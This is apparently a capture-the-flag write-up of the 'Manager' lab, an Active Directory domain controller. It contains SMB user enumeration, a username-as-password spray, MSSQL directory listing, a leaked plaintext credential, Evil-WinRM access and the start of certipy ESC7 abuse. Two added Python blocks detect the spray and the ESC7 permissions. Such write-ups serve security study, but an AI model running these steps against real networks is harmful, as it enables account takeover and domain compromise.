Manager

Hack The Box Machine Writeup

Now this guy is looking sharp!

Summary

Manager was an interesting medium Windows box that presented a very small attack surface, mostly Active Directory services, and an interesting way to abuse Microsoft SQL Server. It also involved some unique aspects of Active Directory that are cool to see in a CTF box, such as ADCS abuse. There was a password spray step that I was not a huge fan of, however.

The quest for user.txt starts off by enumerating users over SMB. A simple password spray using the usernames as the passwords yields credentials that can be used to access an MSSQL instance. This instance allows the use of xp_dirtree, which lets the attacker enumerate the file system and find a zip archive left in the webroot. This can then be downloaded, and inside is a hidden config file that contains credentials for the raven user. These can then be used with evil-winrm to get a shell on the box and read user.txt.

I found the privilege escalation to be very finicky and was not a huge fan. This is primarily because the steps for the ESC7 vulnerability have to be completed very quickly, to the point where they all have to be executed as one command to have good success. This stems from issues with clock syncing and Kerberos. The path starts out by using certipy to find that the raven user can exploit ESC7. Using certipy to exploit this vulnerability grants the attacker an administrator.pfx file. This can then be used on the Manager host along with Rubeus to obtain a Ticket Granting Ticket for the administrator user. It can also be used to grab the administrator's NTLM hash, which can then be used with Evil-winrm to get a shell as administrator via a pass-the-hash attack. Then at last root.txt can be read on the administrator user's desktop.

Managers, am I right?

User

Recon

Nmap port scan

An nmap scan reveals that we are likely dealing with an Active Directory Domain Controller.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV 10.10.11.236
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 18:32 EDT
Nmap scan report for manager.htb (10.10.11.236)
Host is up (0.033s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-24 05:32:54Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T05:33:51+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp open  ssl/ldapssl?
|_ssl-date: 2023-10-24T05:33:51+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-10-24T05:33:48
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.99 seconds
```

At this point there is a very small attack surface, essentially just SMB on port 445. As such I will also run a scan with -p- to see if there are any ports we are missing.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV -p- 10.10.11.236
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 21:32 EDT
Nmap scan report for manager.htb (10.10.11.236)
Host is up (0.032s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-24 08:34:50Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T08:36:19+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T08:36:19+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-24T07:21:32
|_Not valid after:  2053-10-24T07:21:32
|_ssl-date: 2023-10-24T08:36:19+00:00; +6h59m58s from scanner time.
| ms-sql-info: 
|   10.10.11.236:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.236:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T08:36:19+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T08:36:19+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49717/tcp open  msrpc         Microsoft Windows RPC
58801/tcp open  msrpc         Microsoft Windows RPC
59500/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m57s, deviation: 0s, median: 6h59m57s
| smb2-time: 
|   date: 2023-10-24T08:35:41
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.08 seconds
```

This discovers a couple more things for us to interact with. Firstly, WinRM is open on port 5985, which we can come back to later if we get a user account. There is also an MSSQL server open on port 1433 that we can attempt to exploit. Lastly there is a web server on port 80.

Web server

The website has four tabs: Home, About, Service and Contact Us.

Pretty standard looking page

About and Service link to about.html and service.html and just display basic information without any interactivity.

Some Lorem Ipsum text

Contact Us is a simple contact form that does not appear to be fully implemented or to send any information anywhere.

The contact form does not seem to do anything

A directory busting attack using Feroxbuster does not find anything of value. This means the web server is likely a dead end for now and there is not much we can do with it.

At least for now

Enumerating SMB

Null and Anonymous Accesses

One of the first things I like to do when coming across SMB is to check it for null or anonymous access. This can be done with smbclient using the -N flag for null auth and the -L flag to list the shares. Doing so we can see the default shares found on a DC. Testing these shares for access, we can tell this is also a dead end for now.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N -L //10.10.11.236/
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.236 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N  //10.10.11.236/NETLOGON
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
```

Enumerating User Names

Another thing we can often gather from SMB is usernames. This can easily be done with crackmapexec and the --rid-brute flag. It will return many items, but we are really only interested in the SidTypeUser objects, as those are the user accounts.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.236 -u 'hackerfren' -p '' --rid-brute
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.10.11.236    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [+] manager.htb\hackerfren: 
SMB         10.10.11.236    445    DC01             [+] Brute forcing RIDs
SMB         10.10.11.236    445    DC01             498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             500: MANAGER\Administrator (SidTypeUser)
SMB         10.10.11.236    445    DC01             501: MANAGER\Guest (SidTypeUser)
SMB         10.10.11.236    445    DC01             502: MANAGER\krbtgt (SidTypeUser)
SMB         10.10.11.236    445    DC01             512: MANAGER\Domain Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             513: MANAGER\Domain Users (SidTypeGroup)
SMB         10.10.11.236    445    DC01             514: MANAGER\Domain Guests (SidTypeGroup)
<...>
MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1113: MANAGER\Zhong (SidTypeUser)
SMB         10.10.11.236    445    DC01             1114: MANAGER\Cheng (SidTypeUser)
SMB         10.10.11.236    445    DC01             1115: MANAGER\Ryan (SidTypeUser)
SMB         10.10.11.236    445    DC01             1116: MANAGER\Raven (SidTypeUser)
SMB         10.10.11.236    445    DC01             1117: MANAGER\JinWoo (SidTypeUser)
SMB         10.10.11.236    445    DC01             1118: MANAGER\ChinHae (SidTypeUser)
SMB         10.10.11.236    445    DC01             1119: MANAGER\Operator (SidTypeUser)
```

Adding all of these users to a users.txt file, we can then password spray against SMB to see if we can find valid credentials for any of them.

The gun is still the longest running unpatched 0-day

Password spray

This is a good kind of thing to have running in the background or as a last resort, since it can be so time consuming. That is, unless you already have passwords, as password reuse is one of the most common methods of compromise. In this case we do not. As such, one thing to check is username:username as creds. Often lazy admins will just set the password to the username so that it is easy to remember.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ cat users.txt
Zhong
Cheng
Ryan
Raven
JinWoo 
ChinHae 
Operator

┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.236 -u users.txt -p users.txt
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.10.11.236    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [-] manager.htb\Zhong:Zhong STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Zhong:Cheng STATUS_LOGON_FAILURE 
```

This fails to find anything. However, we must remember that the password may be in lowercase as well. Checking for this, we find that operator:operator is a valid pair and grants us access to a user account.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ cat users.txt
zhong
cheng
ryan
raven
jinWoo 
chinHae 
operator

┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.236 -u users.txt -p users.txt
<...>
SMB         10.10.11.236    445    DC01             [+] manager.htb\operator:operator 
```
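The spray above worked because one account used its own name as its password, but the same activity is loud from the defender's side: a single source failing once against many different accounts in a few seconds, then succeeding against one of them. The following is an added example, not code from this writeup; the records are constructed to mimic the fields of Windows Security events 4625 (failed logon) and 4624 (successful logon) as a SIEM export might present them, and the source addresses and thresholds are assumptions.

```python
"""Spot a password spray in failed-logon telemetry and correlate any success.

Added example, not part of the original writeup. A spray looks like one
source trying many distinct accounts a few times each inside a short
window, the inverse of a brute force against a single account.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records mimicking 4625/4624 fields; not real logs.
SAMPLE_EVENTS = [
    # One source fails once against each of seven accounts within seconds...
    {"time": "2023-10-24T05:40:01", "event_id": 4625, "target_user": "Zhong", "source_ip": "10.10.14.5"},
    {"time": "2023-10-24T05:40:02", "event_id": 4625, "target_user": "Cheng", "source_ip": "10.10.14.5"},
    {"time": "2023-10-24T05:40:03", "event_id": 4625, "target_user": "Ryan", "source_ip": "10.10.14.5"},
    {"time": "2023-10-24T05:40:04", "event_id": 4625, "target_user": "Raven", "source_ip": "10.10.14.5"},
    {"time": "2023-10-24T05:40:05", "event_id": 4625, "target_user": "JinWoo", "source_ip": "10.10.14.5"},
    {"time": "2023-10-24T05:40:06", "event_id": 4625, "target_user": "ChinHae", "source_ip": "10.10.14.5"},
    {"time": "2023-10-24T05:40:07", "event_id": 4625, "target_user": "Operator", "source_ip": "10.10.14.5"},
    # ...then logs on successfully as one of them (the username-as-password hit).
    {"time": "2023-10-24T05:41:00", "event_id": 4624, "target_user": "operator", "source_ip": "10.10.14.5"},
    # Benign noise: a user mistypes their own password twice, then gets in.
    {"time": "2023-10-24T05:42:10", "event_id": 4625, "target_user": "Ryan", "source_ip": "10.10.11.50"},
    {"time": "2023-10-24T05:42:25", "event_id": 4625, "target_user": "Ryan", "source_ip": "10.10.11.50"},
    {"time": "2023-10-24T05:42:40", "event_id": 4624, "target_user": "Ryan", "source_ip": "10.10.11.50"},
]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_ip: {...}} for every source that failed against at least
    `min_accounts` distinct accounts inside any `window`, together with the
    accounts it subsequently logged on to successfully."""
    failures = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4625:
            failures[ev["source_ip"]].append(
                (datetime.fromisoformat(ev["time"]), ev["target_user"].lower()))

    findings = {}
    for src, fails in failures.items():
        fails.sort()
        widest = set()
        for i, (t0, _) in enumerate(fails):  # sliding window over sorted failures
            seen = {user for t, user in fails[i:] if t - t0 <= window}
            if len(seen) > len(widest):
                widest = seen
        if len(widest) >= min_accounts:
            findings[src] = {"accounts": sorted(widest), "succeeded": [],
                             "first_seen": fails[0][0]}

    # A success from a spraying source after the spray began is the real alarm.
    for ev in events:
        src = ev["source_ip"]
        if ev["event_id"] == 4624 and src in findings:
            when = datetime.fromisoformat(ev["time"])
            user = ev["target_user"].lower()
            if when >= findings[src]["first_seen"] and user not in findings[src]["succeeded"]:
                findings[src]["succeeded"].append(user)
    for f in findings.values():
        f["first_seen"] = f["first_seen"].isoformat()
    return findings


if __name__ == "__main__":
    for src, f in detect_spray(SAMPLE_EVENTS).items():
        print(f"{src}: sprayed {len(f['accounts'])} accounts from {f['first_seen']}, "
              f"then logged on as {f['succeeded'] or 'nobody'}")
```

The threshold of five distinct accounts in five minutes is a starting point, not a standard; tune it to the size of the environment so that a help desk's authentication proxy does not trip it while a spray across a handful of enumerated users still does.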

We can then use this to check the SMB shares we saw before. Unfortunately there is nothing of value in any of them.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -U operator --password=operator \\\\10.10.11.236\\NETLOGON
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 27 06:19:07 2023
  ..                                  D        0  Thu Jul 27 06:19:07 2023
```

MSSQL Abuse

From here we can also access the MSSQL server we found open in the -p- nmap scan with the operator:operator credentials. MSSQL is a huge attack surface, and I have found one of the best resources to help with it is Hacktricks. Doing some manual enumeration of the server using the help command (notice the prompt at the bottom of the impacket-mssqlclient output) and the Hacktricks article, we deduce that we have the ability to use xp_dirtree to list directories.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-mssqlclient -windows-auth  "operator:operator"@10.10.11.236 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
<...>
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)> help

    lcd {path}                 - changes the current local directory to {path}
    exit                       - terminates the server process (and this session)
    enable_xp_cmdshell         - you know what it means
    disable_xp_cmdshell        - you know what it means
    enum_db                    - enum databases
    enum_links                 - enum linked servers
    enum_impersonate           - check logins that can be impersonate
    enum_logins                - enum login users
    enum_users                 - enum current db users
    enum_owner                 - enum db owner
    exec_as_user {user}        - impersonate with execute as user
    exec_as_login {login}      - impersonate with execute as login
    xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
    xp_dirtree {path}          - executes xp_dirtree on the path
    sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
    use_link {link}            - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
    ! {cmd}                    - executes a local shell cmd
    show_query                 - show query
    mask_query                 - mask query

SQL (MANAGER\Operator  guest@master)> xp_dirtree C:
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   
Documents and Settings          1      0   
inetpub                         1      0   
PerfLogs                        1      0   
Program Files                   1      0   
Program Files (x86)             1      0   
ProgramData                     1      0   
Recovery                        1      0   
SQL2019                         1      0   
System Volume Information       1      0   
Users                           1      0   
Windows                         1      0
```

Listing the IIS webroot with xp_dirtree reveals a backup archive, website-backup-27-07-23-old.zip, sitting next to the site files. Since it lives in the webroot, we can simply download it over HTTP with curl.

```sh
SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   
contact.html                          1      1   
css                                   1      0   
images                                1      0   
index.html                            1      1   
js                                    1      0   
service.html                          1      1   
web.config                            1      1   
website-backup-27-07-23-old.zip       1      1 

┌──(kali㉿kali)-[~/Desktop]
└─$ curl http://10.10.11.236/website-backup-27-07-23-old.zip > backup.zip
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1020k  100 1020k    0     0  3220k      0 --:--:-- --:--:-- --:--:-- 3230k
```

That's what i'm saying!

Shell as Raven

Unzipping this with the -d flag to place it into a new folder, we can tell it looks like what we expect: a backup of the web server.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ unzip -d ./backup backup.zip 
Archive:  backup.zip
  inflating: ./backup/.old-conf.xml  
  inflating: ./backup/about.html     
  inflating: ./backup/contact.html   
  <...>
  inflating: ./backup/index.html     
  inflating: ./backup/js/bootstrap.js  
  inflating: ./backup/js/jquery-3.4.1.min.js  
  inflating: ./backup/service.html
```

There is a hidden .old-conf.xml file that looks like it may contain useful information such as credentials. Looking in this file we find credentials for the raven user: R4v3nBe5tD3veloP3r!123.

```sh
┌──(kali㉿kali)-[~/Desktop/backup]
└─$ ls -la
total 104
<...>
-rw-r--r--  1 kali kali   698 Jul 27 05:35 .old-conf.xml
-rw-r--r--  1 kali kali  7900 Jul 27 05:32 service.html

┌──(kali㉿kali)-[~/Desktop/backup]
└─$ cat .old-conf.xml 
<?xml version="1.0" encoding="UTF-8"?>
<...>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
```

We can now test these against SMB using crackmapexec to see if they are working credentials.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.10.11.236    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 
```

It is also worth checking them against the WinRM port we found open in the -p- nmap scan. It turns out the raven user does have remote management privileges, and we are able to gain an interactive shell through Evil-winrm and grab user.txt.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB         10.10.11.236    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:manager.htb)
HTTP        10.10.11.236    5985   DC01             [*] http://10.10.11.236:5985/wsman
WINRM       10.10.11.236    5985   DC01             [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!) 

┌──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
<...>
*Evil-WinRM* PS C:\Users\Raven\Desktop> cat user.txt
35ad1378833407d82639ab3df474fbee
```

Ravens are based animals

Root

Enumeration

Manual

Some manual enumeration looking through the file system or at listening TCP ports does not reveal anything of value. Nor does checking sudo permissions or looking for SUID binaries.

Winpeas

At this point it was time to resort to automated enumeration. I used the upload function of Evil-WinRM to upload winPEAS and ran it.

```powershell
*Evil-WinRM* PS C:\Users\Raven\Documents> upload winPEASany.exe
Info: Uploading /home/kali/tools/winPEASany.exe to C:\Users\Raven\Documents\winPEASany.exe
Data: 3183956 bytes of 3183956 bytes copied
Info: Upload successful!

*Evil-WinRM* PS C:\Users\Raven\Documents> ./winPEASany.exe
<...WinPEAS output...>
```

Sadly this does not reveal anything of value to use either. At this point it was time to attack the domain itself.

I always love seeing that little smiling pea

Certipy

One of the good things to quickly check for on Windows Active Directory machines is certificate (AD CS) misconfigurations that may allow some level of exploitation. Certipy is a great tool to check for and exploit these misconfigurations, all from our attacking Linux host. We begin by using the find command to gather information about the domain, its certificate authorities and its templates. The -vulnerable flag limits the output to the CAs and templates Certipy considers exploitable.

```sh
┌──(kali㉿kali)-[~/tools]
└─$ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable
Certipy v4.8.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Saved BloodHound data to '20231023194015_Certipy.zip'
[*] Saved text output to '20231023194015_Certipy.txt'
[*] Saved JSON output to '20231023194015_Certipy.json'

┌──(kali㉿kali)-[~/tools]
└─$ cat 20231023194015_Certipy.txt
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates
```

Towards the bottom, in the Vulnerabilities section, we can see that we can abuse ESC7 with the raven user. The reason is visible a few lines higher: Raven holds the ManageCa right on manager-DC01-CA alongside the Administrators, Domain Admins and Enterprise Admins groups, and that right lets a CA administrator grant themselves the ability to approve certificate requests.
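The ESC7 finding above boils down to one thing that is easy to audit on your own CAs: a principal outside the expected administrator groups holding ManageCa or ManageCertificates. The following is an added example, not code from this writeup or from Certipy; it parses the text report layout as printed above (an assumption about the format, which is why the sample is embedded rather than read from a file) and reports any unexpected holders of the two management rights.

```python
"""Audit a Certipy-style CA permission listing for ESC7 conditions.

Added example, not code from the writeup or from Certipy. It parses the
text report layout shown in this writeup and flags any principal holding
ManageCa or ManageCertificates that is not one of the expected CA
administrator groups.
"""

# Constructed from the report in this writeup; the layout mirrors the text output above.
CERTIPY_TEXT = r"""
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
"""

# Groups that legitimately administer a CA; anyone else holding a management
# right is an ESC7 candidate. Assumption: adjust this set to your environment.
EXPECTED_CA_ADMINS = {"administrators", "domain admins", "enterprise admins"}
MANAGEMENT_RIGHTS = ("ManageCa", "ManageCertificates")


def parse_access_rights(report: str) -> dict:
    """Return {right: [principal, ...]} from the 'Access Rights' block."""
    lines = report.splitlines()
    start = next((i for i, l in enumerate(lines) if l.strip() == "Access Rights"), None)
    if start is None:
        return {}
    base_indent = len(lines[start]) - len(lines[start].lstrip())
    rights, current = {}, None
    for line in lines[start + 1:]:
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if indent <= base_indent:      # dedented: we have left the Access Rights block
            break
        if ":" in line:                # "Right : first principal"
            name, principal = line.split(":", 1)
            current = name.strip()
            rights[current] = [principal.strip()]
        elif current is not None:      # continuation line: another principal for the same right
            rights[current].append(line.strip())
    return rights


def find_esc7(rights: dict) -> dict:
    """Map each management right to the unexpected principals holding it."""
    findings = {}
    for right in MANAGEMENT_RIGHTS:
        for principal in rights.get(right, []):
            account = principal.split("\\")[-1].lower()   # strip the DOMAIN\ prefix
            if account not in EXPECTED_CA_ADMINS:
                findings.setdefault(right, []).append(principal)
    return findings


if __name__ == "__main__":
    for right, holders in find_esc7(parse_access_rights(CERTIPY_TEXT)).items():
        print(f"ESC7 candidate: {', '.join(holders)} hold {right}")
```

Enroll is deliberately left out of the check: ordinary users are supposed to be able to enroll, and it is the management rights that turn a low-privileged account into a CA administrator.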

Microsoft doing Microsoft things

ESC7

Attack 2 in the linked Hacktricks article is what we will go off of, as it uses certipy. There is also an overview of the process on the certipy GitHub page. The first thing to do whenever attacking an AD domain is to sync our clock with the DC over NTP so that we don't run into Kerberos errors; the nmap scans above reported a clock skew of about seven hours, far more than the few minutes of drift Kerberos will tolerate. This can be done with the ntpdate command and the -u flag. We will also have to be quick, or our time may desync again.

```sh
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo ntpdate -u 10.10.11.236
2023-10-24 03:25:17.521951 (-0400) +25198.905645 +/- 0.016122 10.10.11.236 s1 no-leap
CLOCK: time stepped by 25198.905645

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo ntpdate -q 10.10.11.236
2023-10-24 03:27:13.370978 (-0400) -0.000982 +/- 0.016209 10.10.11.236 s1 no-leap

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo ntpdate -q 10.10.11.236
2023-10-24 03:27:16.581508 (-0400) +25198.894906 +/- 0.017021 10.10.11.236 s1 no-leap
```

We then edit the provided examples, changing the command flags as required. This adds our Raven user as an officer on the CA.

```sh
┌──(kali㉿kali)-[~/tools]
└─$ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manger.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
